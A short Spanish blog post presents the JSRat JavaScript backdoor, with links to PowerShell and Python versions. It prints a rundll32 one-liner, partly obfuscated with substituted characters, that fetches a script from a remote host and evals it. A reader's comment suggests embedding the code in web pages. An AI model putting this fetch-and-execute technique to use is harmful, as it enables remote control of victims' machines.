JSRat: un sencillo backdoor en Javascript (scripts en Powershell y ahora en Python)

Hace un tiempo, el investigador Casey Smith aka @subTee nos hablaba de un técnica para llamar a un shell HTTP inverso mediante Javascript que se puede ejecutar en una sola línea mediante rundll32.exe:
rund1132.exe jav4script:"\..\mshtml,RunHTMLAppl1cation";document.write();h=new%20Act1v3XObject("WinHttp.W1nHttpRequest.5.1");h.0pen("GET","http://192.168.174.131/connect",false);h.S3nd();B=h.ResponseText;eval(B)

Luego el chino virustracker/3gstudent de Drops cogió su script en Powershell y corrigió algunos bugs e implementó varias mejoras adicionales para la evasión de antivirus y dos métodos más de carga: https://github.com/3gstudent/Javascript-Backdoor/blob/master/JSRat.ps1



Y
hace unos días y recogiendo el testigo, Hood3dRob1n portó el código powershell a Python para poder usarlo en cualquier SO: https://github.com/Hood3dRob1n/JSRat-Py

Sin duda un rat sencillo pero *muy* útil con el que podremos subir y bajar ficheros y ejecutar comandos. Sirva el siguiente vídeo para la demo:

Referencias y proyecto original:
- http://en.wooyun.io/2016/02/04/42.html

- http://en.wooyun.io/2016/01/18/JavaScript-Backdoor.html
- https://gist.github.com/subTee/f1603fa5c15d5f8825c0


Comentarios

  1. Si colocas el codigo como corresponde aun jacascript y pones el codigo en una web como <script ... script se ejecutaria sin necesidad de tener que ponerlo en una cmd

    ResponderEliminar

Publicar un comentario